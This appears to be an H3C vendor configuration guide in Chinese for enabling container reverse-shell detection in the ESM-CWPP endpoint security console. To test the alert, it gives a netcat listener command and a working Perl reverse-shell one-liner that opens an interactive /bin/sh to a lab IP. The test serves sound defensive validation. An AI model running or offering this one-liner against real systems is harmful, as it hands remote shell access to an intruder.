欢迎user
10-容器安全容器反弹shell典型配置
本章节下载: 10-容器安全容器反弹shell典型配置 (779.79 KB)
本文档介绍ESM-CWPP终端安全管理系统执行容器安全容器反弹shell检测配置举例。
本文档中的配置均是在实验室环境下进行的配置和验证,配置前设备的所有参数均采用出厂时的缺省配置。如果您已经对设备进行了配置,为了保证配置效果,请确认现有配置和以下举例中的配置不冲突。
终端安全管理系统组网方式比较简单,只要安装客户端的主机与管理端网络可达即可。
安装服务端后,客户端可以自动连接到服务端。管理员可直接通过Web浏览器进行管理。
· 登录Web管理控制台。
· 通过配置反弹shell功能,实时监测容器内反弹shell行为。
打开Web浏览器,使用HTTPS协议在地址栏输入服务端地址和端口,输入格式:https://ServerIP/passport/login.html(请将ServerIP替换为服务端实际IP地址,如“https://192.168.10.1/passport/login.html”),弹出输入账户信息登录页面,输入系统管理员账户信息和验证码,单击<登录>,如下图所示。
图1 账户信息输入页面
图2 控制台
图3 容器安全控制台
安全策略中心-容器安全策略--策略管理,创建策略,开启反弹shell,如下图所示。
图4 容器反弹shell监测配置
(1) 主机安装perl
apt-get update
apt install perl
(2) 在主机上执行
nc -lvvp 12333
(3) 在容器上执行(主机的ip地址为:10.22.2.235)
perl -e 'use Socket;$i="10.22.2.235";$p=12333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
(4) 进入管理控制台,告警中心--安全事件,查看告警。
图5 实时告警
不同款型规格的资料略有差异, 详细信息请向具体销售和400咨询。H3C保留在没有任何通知或提示的情况下对资料内容进行修改的权利!